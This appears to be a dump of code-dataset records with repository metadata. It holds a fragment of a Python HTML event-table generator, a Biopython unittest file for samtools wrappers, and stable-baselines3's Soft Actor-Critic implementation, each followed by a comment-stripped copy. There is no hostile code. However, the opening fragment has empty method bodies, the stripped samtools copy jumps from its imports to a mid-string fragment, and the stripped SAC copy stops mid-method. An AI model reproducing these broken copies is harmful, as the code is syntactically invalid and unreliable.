DEBUG.info("InstanceTopologyHTMLVisitor: Instanced.")
self.bodytext = ""
self.prototypetext = ""
self.__fp_dict = (
dict()
) # dictionary of instance name keyword to file handle pointer
def _writeTmpl(self, instance, c, visit_str):
DEBUG.debug("InstanceTopologyHTMLVisitor:%s" % visit_str)
DEBUG.debug("===================================")
DEBUG.debug(c)
self.__fp_dict[instance].writelines(c.__str__())
DEBUG.debug("===================================")
def initFilesVisit(self, obj):
# Check for command dir here and if none creat it but always switch into it
if not os.path.exists(self.__cmd_dir):
os.mkdir(self.__cmd_dir)
os.chdir(self.__cmd_dir)
# Iterate over types
for k in list(obj.get_base_id_dict().keys()):
tlist = obj.get_base_id_dict()[k]
# print "Type: %s\n" % k,
# Iterate over instances and get name
# Open file if events exist if not do nothing
for t in tlist:
# print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
name = t[0]
events_list = t[3].get_comp_xml().get_events()
if len(events_list) > 0:
filename = "%s_events.html" % t[0]
# Open file for writing here...
DEBUG.info("Open file: %s" % filename)
try:
self.__fp_dict[name] = open(filename, "w")
DEBUG.info("Completed")
except OSError:
PRINT.info("Could not open %s file." % filename)
sys.exit(-1)
DEBUG.info(
"Generating HTML Event Table for %s:%s component instance..."
% (t[0], k)
)
os.chdir("..")
def startSourceFilesVisit(self, obj):
def includes1Visit(self, obj):
def includes2Visit(self, obj):
def namespaceVisit(self, obj):
def eventArgsStr(self):
def f(args):
def g(lst):
name = lst[0]
return name
return self.argsString(list(map(g, args)))
return f
def publicVisit(self, obj):
# os.chdir(self.__cmd_dir)
c = HtmlEventsTablePage.HtmlEventsTablePage()
for k in list(obj.get_base_id_dict().keys()):
tlist = obj.get_base_id_dict()[k]
# print "Type: %s\n" % k,
for t in tlist:
if t[0] in list(self.__fp_dict.keys()):
# print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
eobj = t[3].get_comp_xml()
c.name = "{}:{}".format(t[0], k)
c.base_id = t[1]
c.has_events = len(eobj.get_events()) > 0
c.events = self.__model_parser.getEventsList(eobj)
c.event_enums = self.__model_parser.getEventEnumList(eobj)
c.event_args = self.__model_parser.getEventArgsDict(eobj)
c.event_params = c.event_args
c.event_args_str = self.eventArgsStr()
c.event_param_strs = self.__model_parser.getEventArgsPrototypeStringDict(
eobj
)
self._writeTmpl(t[0], c, "InstanceTopologyEventsHTML_Visitor")
def protectedVisit(self, obj):
def privateVisit(self, obj):
def finishSourceFilesVisit(self, obj):
for fp in list(self.__fp_dict.keys()):
self.__fp_dict[fp].close()
PRINT.info("Completed generating HTML event tables...")
| true
| true
|
f7059d4b996373df631835952df25f3736b20114
| 10,386
|
py
|
Python
|
Tests/test_samtools_tool.py
|
bneron/biopython
|
2c52e57661c8f6cdf4a191850b2f6871f8582af7
|
[
"PostgreSQL"
] | null | null | null |
Tests/test_samtools_tool.py
|
bneron/biopython
|
2c52e57661c8f6cdf4a191850b2f6871f8582af7
|
[
"PostgreSQL"
] | null | null | null |
Tests/test_samtools_tool.py
|
bneron/biopython
|
2c52e57661c8f6cdf4a191850b2f6871f8582af7
|
[
"PostgreSQL"
] | null | null | null |
# Copyright 2014 by Saket Choudhary. Based on test_Clustalw_tool.py by Peter
# Cock .
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# Last Checked with samtools [0.1.18 (r982:295)]
from Bio import MissingExternalDependencyError
import sys
import os
import unittest
from Bio.Sequencing.Applications import SamtoolsViewCommandline
from Bio.Sequencing.Applications import SamtoolsCalmdCommandline
from Bio.Sequencing.Applications import SamtoolsCatCommandline
from Bio.Sequencing.Applications import SamtoolsFaidxCommandline
from Bio.Sequencing.Applications import SamtoolsIdxstatsCommandline
from Bio.Sequencing.Applications import SamtoolsIndexCommandline
from Bio.Sequencing.Applications import SamtoolsMergeCommandline
from Bio.Sequencing.Applications import SamtoolsMpileupCommandline
from Bio.Sequencing.Applications import SamtoolsSortCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsPhaseCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsReheaderCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsRmdupCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsTargetcutCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsFixmateCommandline
#################################################################
# Try to avoid problems when the OS is in another language
os.environ['LANG'] = 'C'
samtools_exe = None
if sys.platform == "win32":
# TODO - Check the path?
try:
# This can vary depending on the Windows language.
prog_files = os.environ["PROGRAMFILES"]
except KeyError:
prog_files = r"C:\Program Files"
# By default tries C:\Program Files\samtools\samtools.exe
# or C:\Program Files\samtools.exe was chosen
likely_dirs = ["samtools", ""]
likely_exes = ["samtools.exe"]
for folder in likely_dirs:
if os.path.isdir(os.path.join(prog_files, folder)):
for filename in likely_exes:
if os.path.isfile(os.path.join(prog_files, folder, filename)):
samtools_exe = os.path.join(prog_files, folder, filename)
break
if samtools_exe:
break
else:
from Bio._py3k import getoutput
output = getoutput("samtools")
# Since "not found" may be in another language, try and be sure this is
# really the samtools tool's output
if ("not found" not in output and
"samtools (Tools for alignments in the SAM format)" in output):
samtools_exe = "samtools"
if not samtools_exe:
raise MissingExternalDependencyError(
"""Install samtools and correctly set the file path to the program
if you want to use it from Biopython""")
class SamtoolsTestCase(unittest.TestCase):
"""Class for implementing Samtools test cases."""
def setUp(self):
self.files_to_clean = set()
self.samfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"sam1.sam")
self.reference = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"BWA",
"human_g1k_v37_truncated.fasta")
self.referenceindexfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"BWA",
"human_g1k_v37_truncated.fasta.fai")
self.samfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"sam2.sam")
self.bamfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1.bam")
self.bamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam2.bam")
self.outsamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"out.sam")
self.outbamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"out.bam")
self.bamindexfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1.bam.bai")
self.sortedbamfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1_sorted.bam")
self.sortedbamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam2_sorted.bam")
self.files_to_clean = [self.referenceindexfile, self.bamindexfile1, self.outbamfile]
def tearDown(self):
for filename in self.files_to_clean:
if os.path.isfile(filename):
os.remove(filename)
def test_view(self):
"""Test for samtools view"""
cmdline = SamtoolsViewCommandline(samtools_exe)
cmdline.set_parameter("input_file", self.bamfile1)
stdout_bam, stderr_bam = cmdline()
self.assertTrue(stderr_bam.startswith(""),
"SAM file viewing failed: \n%s\nStdout:%s"
% (cmdline, stdout_bam))
cmdline.set_parameter("input_file", self.samfile1)
cmdline.set_parameter("S", True)
stdout_sam, stderr_sam = cmdline()
self.assertTrue(
stdout_sam.startswith("HWI-1KL120:88:D0LRBACXX:1:1101:1780:2146"),
"SAM file viewing failed:\n%s\nStderr:%s"
% (cmdline, stderr_sam))
def create_fasta_index(self):
"""Creates index for reference fasta sequence."""
cmdline = SamtoolsFaidxCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
stdout, stderr = cmdline()
def create_bam_index(self, input_bam):
"""Creates index of an input bam file"""
cmdline = SamtoolsIndexCommandline(samtools_exe)
cmdline.set_parameter("input_bam", input_bam)
stdout, stderr = cmdline()
def test_faidx(self):
cmdline = SamtoolsFaidxCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools faidx failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.isfile(self.referenceindexfile))
def test_calmd(self):
"""Test for samtools calmd"""
self.create_fasta_index()
cmdline = SamtoolsCalmdCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
cmdline.set_parameter("input_bam", self.bamfile1)
# If there is no index file for the reference
# samtools calmd creates one at the time of calling
if os.path.exists(self.referenceindexfile):
# print("exists")
stderr_calmd_expected = ""
else:
# print("doesnt exist")
stderr_calmd_expected = "[fai_load] build FASTA index.\n"
stdout, stderr = cmdline()
self.assertEqual(stderr, stderr_calmd_expected)
def test_cat(self):
cmdline = SamtoolsCatCommandline(samtools_exe)
cmdline.set_parameter("o", self.outbamfile)
cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
stdout, stderr = cmdline()
self.assertEqual(stderr, "")
# TODO: def test_fixmate(self):
def test_sort(self):
cmdline = SamtoolsSortCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
cmdline.set_parameter("out_prefix", "SamBam/out")
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools sort failed:\n%s\nStderr:%s"
% (cmdline, stderr))
def test_index(self):
cmdline = SamtoolsIndexCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools index failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.exists(self.bamindexfile1))
def test_idxstats(self):
self.create_bam_index(self.bamfile1)
cmdline = SamtoolsIdxstatsCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools idxstats failed:\n%s\nStderr:%s"
% (cmdline, stderr))
def test_merge(self):
cmdline = SamtoolsMergeCommandline(samtools_exe)
cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
cmdline.set_parameter("out_bam", self.outbamfile)
cmdline.set_parameter("f", True) # Overwrite out.bam if it exists
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools merge failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.exists(self.outbamfile))
def test_mpileup(self):
cmdline = SamtoolsMpileupCommandline(samtools_exe)
cmdline.set_parameter("input_file", [self.bamfile1])
stdout, stderr = cmdline()
self.assertFalse("[bam_pileup_core]" in stdout)
def test_mpileup_list(self):
cmdline = SamtoolsMpileupCommandline(samtools_exe)
cmdline.set_parameter("input_file", [self.sortedbamfile1, self.sortedbamfile2])
stdout, stderr = cmdline()
self.assertFalse("[bam_pileup_core]" in stdout)
# TODO: def test_phase(self):
# TODO: def test_reheader(self):
# TODO: def test_rmdup(self):
# TODO: def test_targetcut(self):
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| 43.638655
| 92
| 0.612074
|
from Bio import MissingExternalDependencyError
import sys
import os
import unittest
from Bio.Sequencing.Applications import SamtoolsViewCommandline
from Bio.Sequencing.Applications import SamtoolsCalmdCommandline
from Bio.Sequencing.Applications import SamtoolsCatCommandline
from Bio.Sequencing.Applications import SamtoolsFaidxCommandline
from Bio.Sequencing.Applications import SamtoolsIdxstatsCommandline
from Bio.Sequencing.Applications import SamtoolsIndexCommandline
from Bio.Sequencing.Applications import SamtoolsMergeCommandline
from Bio.Sequencing.Applications import SamtoolsMpileupCommandline
from Bio.Sequencing.Applications import SamtoolsSortCommandline
mBam",
"bam1.bam")
self.bamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam2.bam")
self.outsamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"out.sam")
self.outbamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"out.bam")
self.bamindexfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1.bam.bai")
self.sortedbamfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1_sorted.bam")
self.sortedbamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam2_sorted.bam")
self.files_to_clean = [self.referenceindexfile, self.bamindexfile1, self.outbamfile]
def tearDown(self):
for filename in self.files_to_clean:
if os.path.isfile(filename):
os.remove(filename)
def test_view(self):
cmdline = SamtoolsViewCommandline(samtools_exe)
cmdline.set_parameter("input_file", self.bamfile1)
stdout_bam, stderr_bam = cmdline()
self.assertTrue(stderr_bam.startswith(""),
"SAM file viewing failed: \n%s\nStdout:%s"
% (cmdline, stdout_bam))
cmdline.set_parameter("input_file", self.samfile1)
cmdline.set_parameter("S", True)
stdout_sam, stderr_sam = cmdline()
self.assertTrue(
stdout_sam.startswith("HWI-1KL120:88:D0LRBACXX:1:1101:1780:2146"),
"SAM file viewing failed:\n%s\nStderr:%s"
% (cmdline, stderr_sam))
def create_fasta_index(self):
cmdline = SamtoolsFaidxCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
stdout, stderr = cmdline()
def create_bam_index(self, input_bam):
cmdline = SamtoolsIndexCommandline(samtools_exe)
cmdline.set_parameter("input_bam", input_bam)
stdout, stderr = cmdline()
def test_faidx(self):
cmdline = SamtoolsFaidxCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools faidx failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.isfile(self.referenceindexfile))
def test_calmd(self):
self.create_fasta_index()
cmdline = SamtoolsCalmdCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
cmdline.set_parameter("input_bam", self.bamfile1)
# If there is no index file for the reference
# samtools calmd creates one at the time of calling
if os.path.exists(self.referenceindexfile):
# print("exists")
stderr_calmd_expected = ""
else:
# print("doesnt exist")
stderr_calmd_expected = "[fai_load] build FASTA index.\n"
stdout, stderr = cmdline()
self.assertEqual(stderr, stderr_calmd_expected)
def test_cat(self):
cmdline = SamtoolsCatCommandline(samtools_exe)
cmdline.set_parameter("o", self.outbamfile)
cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
stdout, stderr = cmdline()
self.assertEqual(stderr, "")
# TODO: def test_fixmate(self):
def test_sort(self):
cmdline = SamtoolsSortCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
cmdline.set_parameter("out_prefix", "SamBam/out")
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools sort failed:\n%s\nStderr:%s"
% (cmdline, stderr))
def test_index(self):
cmdline = SamtoolsIndexCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools index failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.exists(self.bamindexfile1))
def test_idxstats(self):
self.create_bam_index(self.bamfile1)
cmdline = SamtoolsIdxstatsCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools idxstats failed:\n%s\nStderr:%s"
% (cmdline, stderr))
def test_merge(self):
cmdline = SamtoolsMergeCommandline(samtools_exe)
cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
cmdline.set_parameter("out_bam", self.outbamfile)
cmdline.set_parameter("f", True) # Overwrite out.bam if it exists
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools merge failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.exists(self.outbamfile))
def test_mpileup(self):
cmdline = SamtoolsMpileupCommandline(samtools_exe)
cmdline.set_parameter("input_file", [self.bamfile1])
stdout, stderr = cmdline()
self.assertFalse("[bam_pileup_core]" in stdout)
def test_mpileup_list(self):
cmdline = SamtoolsMpileupCommandline(samtools_exe)
cmdline.set_parameter("input_file", [self.sortedbamfile1, self.sortedbamfile2])
stdout, stderr = cmdline()
self.assertFalse("[bam_pileup_core]" in stdout)
# TODO: def test_phase(self):
# TODO: def test_reheader(self):
# TODO: def test_rmdup(self):
# TODO: def test_targetcut(self):
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| true
| true
|
f7059d75bd3c6acb85c90246d579ae72b76286c1
| 14,941
|
py
|
Python
|
stable_baselines3/sac/sac.py
|
squalidux/stable-baselines3
|
72690b3ed0635c68f037b3dc121bd9987a6e82a8
|
[
"MIT"
] | 3
|
2022-01-22T21:24:03.000Z
|
2022-03-31T05:32:54.000Z
|
stable_baselines3/sac/sac.py
|
squalidux/stable-baselines3
|
72690b3ed0635c68f037b3dc121bd9987a6e82a8
|
[
"MIT"
] | 1
|
2020-07-31T08:19:32.000Z
|
2020-07-31T08:19:32.000Z
|
stable_baselines3/sac/sac.py
|
squalidux/stable-baselines3
|
72690b3ed0635c68f037b3dc121bd9987a6e82a8
|
[
"MIT"
] | 1
|
2022-03-10T11:33:06.000Z
|
2022-03-10T11:33:06.000Z
|
from typing import Any, Dict, List, Optional, Tuple, Type, Union
import gym
import numpy as np
import torch as th
from torch.nn import functional as F
from stable_baselines3.common.buffers import ReplayBuffer
from stable_baselines3.common.noise import ActionNoise
from stable_baselines3.common.off_policy_algorithm import OffPolicyAlgorithm
from stable_baselines3.common.type_aliases import GymEnv, MaybeCallback, Schedule
from stable_baselines3.common.utils import polyak_update
from stable_baselines3.sac.policies import SACPolicy
class SAC(OffPolicyAlgorithm):
"""
Soft Actor-Critic (SAC)
Off-Policy Maximum Entropy Deep Reinforcement Learning with a Stochastic Actor,
This implementation borrows code from original implementation (https://github.com/haarnoja/sac)
from OpenAI Spinning Up (https://github.com/openai/spinningup), from the softlearning repo
(https://github.com/rail-berkeley/softlearning/)
and from Stable Baselines (https://github.com/hill-a/stable-baselines)
Paper: https://arxiv.org/abs/1801.01290
Introduction to SAC: https://spinningup.openai.com/en/latest/algorithms/sac.html
Note: we use double q target and not value target as discussed
in https://github.com/hill-a/stable-baselines/issues/270
:param policy: The policy model to use (MlpPolicy, CnnPolicy, ...)
:param env: The environment to learn from (if registered in Gym, can be str)
:param learning_rate: learning rate for adam optimizer,
the same learning rate will be used for all networks (Q-Values, Actor and Value function)
it can be a function of the current progress remaining (from 1 to 0)
:param buffer_size: size of the replay buffer
:param learning_starts: how many steps of the model to collect transitions for before learning starts
:param batch_size: Minibatch size for each gradient update
:param tau: the soft update coefficient ("Polyak update", between 0 and 1)
:param gamma: the discount factor
:param train_freq: Update the model every ``train_freq`` steps. Alternatively pass a tuple of frequency and unit
like ``(5, "step")`` or ``(2, "episode")``.
:param gradient_steps: How many gradient steps to do after each rollout (see ``train_freq``)
Set to ``-1`` means to do as many gradient steps as steps done in the environment
during the rollout.
:param action_noise: the action noise type (None by default), this can help
for hard exploration problem. Cf common.noise for the different action noise type.
:param replay_buffer_class: Replay buffer class to use (for instance ``HerReplayBuffer``).
If ``None``, it will be automatically selected.
:param replay_buffer_kwargs: Keyword arguments to pass to the replay buffer on creation.
:param optimize_memory_usage: Enable a memory efficient variant of the replay buffer
at a cost of more complexity.
See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195
:param ent_coef: Entropy regularization coefficient. (Equivalent to
inverse of reward scale in the original SAC paper.) Controlling exploration/exploitation trade-off.
Set it to 'auto' to learn it automatically (and 'auto_0.1' for using 0.1 as initial value)
:param target_update_interval: update the target network every ``target_network_update_freq``
gradient steps.
:param target_entropy: target entropy when learning ``ent_coef`` (``ent_coef = 'auto'``)
:param use_sde: Whether to use generalized State Dependent Exploration (gSDE)
instead of action noise exploration (default: False)
:param sde_sample_freq: Sample a new noise matrix every n steps when using gSDE
Default: -1 (only sample at the beginning of the rollout)
:param use_sde_at_warmup: Whether to use gSDE instead of uniform sampling
during the warm up phase (before learning starts)
:param create_eval_env: Whether to create a second environment that will be
used for evaluating the agent periodically. (Only available when passing string for the environment)
:param policy_kwargs: additional arguments to be passed to the policy on creation
:param verbose: the verbosity level: 0 no output, 1 info, 2 debug
:param seed: Seed for the pseudo random generators
:param device: Device (cpu, cuda, ...) on which the code should be run.
Setting it to auto, the code will be run on the GPU if possible.
:param _init_setup_model: Whether or not to build the network at the creation of the instance
"""
def __init__(
self,
policy: Union[str, Type[SACPolicy]],
env: Union[GymEnv, str],
learning_rate: Union[float, Schedule] = 3e-4,
buffer_size: int = 1_000_000, # 1e6
learning_starts: int = 100,
batch_size: int = 256,
tau: float = 0.005,
gamma: float = 0.99,
train_freq: Union[int, Tuple[int, str]] = 1,
gradient_steps: int = 1,
action_noise: Optional[ActionNoise] = None,
replay_buffer_class: Optional[ReplayBuffer] = None,
replay_buffer_kwargs: Optional[Dict[str, Any]] = None,
optimize_memory_usage: bool = False,
ent_coef: Union[str, float] = "auto",
target_update_interval: int = 1,
target_entropy: Union[str, float] = "auto",
use_sde: bool = False,
sde_sample_freq: int = -1,
use_sde_at_warmup: bool = False,
tensorboard_log: Optional[str] = None,
create_eval_env: bool = False,
policy_kwargs: Optional[Dict[str, Any]] = None,
verbose: int = 0,
seed: Optional[int] = None,
device: Union[th.device, str] = "auto",
_init_setup_model: bool = True,
):
super(SAC, self).__init__(
policy,
env,
SACPolicy,
learning_rate,
buffer_size,
learning_starts,
batch_size,
tau,
gamma,
train_freq,
gradient_steps,
action_noise,
replay_buffer_class=replay_buffer_class,
replay_buffer_kwargs=replay_buffer_kwargs,
policy_kwargs=policy_kwargs,
tensorboard_log=tensorboard_log,
verbose=verbose,
device=device,
create_eval_env=create_eval_env,
seed=seed,
use_sde=use_sde,
sde_sample_freq=sde_sample_freq,
use_sde_at_warmup=use_sde_at_warmup,
optimize_memory_usage=optimize_memory_usage,
supported_action_spaces=(gym.spaces.Box),
support_multi_env=True,
)
self.target_entropy = target_entropy
self.log_ent_coef = None # type: Optional[th.Tensor]
# Entropy coefficient / Entropy temperature
# Inverse of the reward scale
self.ent_coef = ent_coef
self.target_update_interval = target_update_interval
self.ent_coef_optimizer = None
if _init_setup_model:
self._setup_model()
def _setup_model(self) -> None:
super(SAC, self)._setup_model()
self._create_aliases()
# Target entropy is used when learning the entropy coefficient
if self.target_entropy == "auto":
# automatically set target entropy if needed
self.target_entropy = -np.prod(self.env.action_space.shape).astype(np.float32)
else:
# Force conversion
# this will also throw an error for unexpected string
self.target_entropy = float(self.target_entropy)
# The entropy coefficient or entropy can be learned automatically
# see Automating Entropy Adjustment for Maximum Entropy RL section
# of https://arxiv.org/abs/1812.05905
if isinstance(self.ent_coef, str) and self.ent_coef.startswith("auto"):
# Default initial value of ent_coef when learned
init_value = 1.0
if "_" in self.ent_coef:
init_value = float(self.ent_coef.split("_")[1])
assert init_value > 0.0, "The initial value of ent_coef must be greater than 0"
# Note: we optimize the log of the entropy coeff which is slightly different from the paper
# as discussed in https://github.com/rail-berkeley/softlearning/issues/37
self.log_ent_coef = th.log(th.ones(1, device=self.device) * init_value).requires_grad_(True)
self.ent_coef_optimizer = th.optim.Adam([self.log_ent_coef], lr=self.lr_schedule(1))
else:
# Force conversion to float
# this will throw an error if a malformed string (different from 'auto')
# is passed
self.ent_coef_tensor = th.tensor(float(self.ent_coef)).to(self.device)
def _create_aliases(self) -> None:
self.actor = self.policy.actor
self.critic = self.policy.critic
self.critic_target = self.policy.critic_target
def train(self, gradient_steps: int, batch_size: int = 64) -> None:
# Switch to train mode (this affects batch norm / dropout)
self.policy.set_training_mode(True)
# Update optimizers learning rate
optimizers = [self.actor.optimizer, self.critic.optimizer]
if self.ent_coef_optimizer is not None:
optimizers += [self.ent_coef_optimizer]
# Update learning rate according to lr schedule
self._update_learning_rate(optimizers)
ent_coef_losses, ent_coefs = [], []
actor_losses, critic_losses = [], []
for gradient_step in range(gradient_steps):
# Sample replay buffer
replay_data = self.replay_buffer.sample(batch_size, env=self._vec_normalize_env)
# We need to sample because `log_std` may have changed between two gradient steps
if self.use_sde:
self.actor.reset_noise()
# Action by the current actor for the sampled state
actions_pi, log_prob = self.actor.action_log_prob(replay_data.observations)
log_prob = log_prob.reshape(-1, 1)
ent_coef_loss = None
if self.ent_coef_optimizer is not None:
# Important: detach the variable from the graph
# so we don't change it with other losses
# see https://github.com/rail-berkeley/softlearning/issues/60
ent_coef = th.exp(self.log_ent_coef.detach())
ent_coef_loss = -(self.log_ent_coef * (log_prob + self.target_entropy).detach()).mean()
ent_coef_losses.append(ent_coef_loss.item())
else:
ent_coef = self.ent_coef_tensor
ent_coefs.append(ent_coef.item())
# Optimize entropy coefficient, also called
# entropy temperature or alpha in the paper
if ent_coef_loss is not None:
self.ent_coef_optimizer.zero_grad()
ent_coef_loss.backward()
self.ent_coef_optimizer.step()
with th.no_grad():
# Select action according to policy
next_actions, next_log_prob = self.actor.action_log_prob(replay_data.next_observations)
# Compute the next Q values: min over all critics targets
next_q_values = th.cat(self.critic_target(replay_data.next_observations, next_actions), dim=1)
next_q_values, _ = th.min(next_q_values, dim=1, keepdim=True)
# add entropy term
next_q_values = next_q_values - ent_coef * next_log_prob.reshape(-1, 1)
# td error + entropy term
target_q_values = replay_data.rewards + (1 - replay_data.dones) * self.gamma * next_q_values
# Get current Q-values estimates for each critic network
# using action from the replay buffer
current_q_values = self.critic(replay_data.observations, replay_data.actions)
# Compute critic loss
critic_loss = 0.5 * sum([F.mse_loss(current_q, target_q_values) for current_q in current_q_values])
critic_losses.append(critic_loss.item())
# Optimize the critic
self.critic.optimizer.zero_grad()
critic_loss.backward()
self.critic.optimizer.step()
# Compute actor loss
# Alternative: actor_loss = th.mean(log_prob - qf1_pi)
# Mean over all critic networks
q_values_pi = th.cat(self.critic.forward(replay_data.observations, actions_pi), dim=1)
min_qf_pi, _ = th.min(q_values_pi, dim=1, keepdim=True)
actor_loss = (ent_coef * log_prob - min_qf_pi).mean()
actor_losses.append(actor_loss.item())
# Optimize the actor
self.actor.optimizer.zero_grad()
actor_loss.backward()
self.actor.optimizer.step()
# Update target networks
if gradient_step % self.target_update_interval == 0:
polyak_update(self.critic.parameters(), self.critic_target.parameters(), self.tau)
self._n_updates += gradient_steps
self.logger.record("train/n_updates", self._n_updates, exclude="tensorboard")
self.logger.record("train/ent_coef", np.mean(ent_coefs))
self.logger.record("train/actor_loss", np.mean(actor_losses))
self.logger.record("train/critic_loss", np.mean(critic_losses))
if len(ent_coef_losses) > 0:
self.logger.record("train/ent_coef_loss", np.mean(ent_coef_losses))
def learn(
self,
total_timesteps: int,
callback: MaybeCallback = None,
log_interval: int = 4,
eval_env: Optional[GymEnv] = None,
eval_freq: int = -1,
n_eval_episodes: int = 5,
tb_log_name: str = "SAC",
eval_log_path: Optional[str] = None,
reset_num_timesteps: bool = True,
) -> OffPolicyAlgorithm:
return super(SAC, self).learn(
total_timesteps=total_timesteps,
callback=callback,
log_interval=log_interval,
eval_env=eval_env,
eval_freq=eval_freq,
n_eval_episodes=n_eval_episodes,
tb_log_name=tb_log_name,
eval_log_path=eval_log_path,
reset_num_timesteps=reset_num_timesteps,
)
def _excluded_save_params(self) -> List[str]:
return super(SAC, self)._excluded_save_params() + ["actor", "critic", "critic_target"]
def _get_torch_save_params(self) -> Tuple[List[str], List[str]]:
state_dicts = ["policy", "actor.optimizer", "critic.optimizer"]
if self.ent_coef_optimizer is not None:
saved_pytorch_variables = ["log_ent_coef"]
state_dicts.append("ent_coef_optimizer")
else:
saved_pytorch_variables = ["ent_coef_tensor"]
return state_dicts, saved_pytorch_variables
| 47.431746
| 116
| 0.658122
|
from typing import Any, Dict, List, Optional, Tuple, Type, Union
import gym
import numpy as np
import torch as th
from torch.nn import functional as F
from stable_baselines3.common.buffers import ReplayBuffer
from stable_baselines3.common.noise import ActionNoise
from stable_baselines3.common.off_policy_algorithm import OffPolicyAlgorithm
from stable_baselines3.common.type_aliases import GymEnv, MaybeCallback, Schedule
from stable_baselines3.common.utils import polyak_update
from stable_baselines3.sac.policies import SACPolicy
class SAC(OffPolicyAlgorithm):
def __init__(
self,
policy: Union[str, Type[SACPolicy]],
env: Union[GymEnv, str],
learning_rate: Union[float, Schedule] = 3e-4,
buffer_size: int = 1_000_000,
learning_starts: int = 100,
batch_size: int = 256,
tau: float = 0.005,
gamma: float = 0.99,
train_freq: Union[int, Tuple[int, str]] = 1,
gradient_steps: int = 1,
action_noise: Optional[ActionNoise] = None,
replay_buffer_class: Optional[ReplayBuffer] = None,
replay_buffer_kwargs: Optional[Dict[str, Any]] = None,
optimize_memory_usage: bool = False,
ent_coef: Union[str, float] = "auto",
target_update_interval: int = 1,
target_entropy: Union[str, float] = "auto",
use_sde: bool = False,
sde_sample_freq: int = -1,
use_sde_at_warmup: bool = False,
tensorboard_log: Optional[str] = None,
create_eval_env: bool = False,
policy_kwargs: Optional[Dict[str, Any]] = None,
verbose: int = 0,
seed: Optional[int] = None,
device: Union[th.device, str] = "auto",
_init_setup_model: bool = True,
):
super(SAC, self).__init__(
policy,
env,
SACPolicy,
learning_rate,
buffer_size,
learning_starts,
batch_size,
tau,
gamma,
train_freq,
gradient_steps,
action_noise,
replay_buffer_class=replay_buffer_class,
replay_buffer_kwargs=replay_buffer_kwargs,
policy_kwargs=policy_kwargs,
tensorboard_log=tensorboard_log,
verbose=verbose,
device=device,
create_eval_env=create_eval_env,
seed=seed,
use_sde=use_sde,
sde_sample_freq=sde_sample_freq,
use_sde_at_warmup=use_sde_at_warmup,
optimize_memory_usage=optimize_memory_usage,
supported_action_spaces=(gym.spaces.Box),
support_multi_env=True,
)
self.target_entropy = target_entropy
self.log_ent_coef = None
self.ent_coef = ent_coef
self.target_update_interval = target_update_interval
self.ent_coef_optimizer = None
if _init_setup_model:
self._setup_model()
def _setup_model(self) -> None:
super(SAC, self)._setup_model()
self._create_aliases()
if self.target_entropy == "auto":
self.target_entropy = -np.prod(self.env.action_space.shape).astype(np.float32)
else:
